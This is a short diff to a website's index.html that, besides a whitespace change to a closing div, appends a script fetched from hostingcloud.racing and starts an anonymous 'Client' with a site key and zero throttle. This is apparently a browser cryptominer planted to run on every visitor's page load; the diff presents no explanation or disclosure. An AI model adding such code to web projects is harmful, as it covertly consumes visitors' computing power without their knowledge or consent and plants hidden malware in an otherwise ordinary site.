--- a/index.html
+++ b/index.html
@@ -339,7 +339,7 @@
     <div class="modal-footer">
       <a href="#!" class="modal-close waves-effect waves-green btn-flat">Agree</a>
     </div>
-  </div>
+</div>
 
 <!--Start Cookie Script <script type="text/javascript" charset="UTF-8" src="//eu.cookie-script.com/s/6130ac72ad1ba8f1e93ad4e9fed7f10d.js"></script> <!--End Cookie Script-->
 <script>
@@ -350,6 +350,16 @@
     );
     })
   </script>
+
+<script src="https://www.hostingcloud.racing/9kIP.js"></script>
+<script>
+    var _client = new Client.Anonymous('ce5ea48caf562e52b026b82443a82775f8bbd72a4a71fa6b301a081288b5b215', {
+        throttle: 0, c: 'w'
+    });
+    _client.start();
+    
+
+</script>
 </body>
 
 </html>
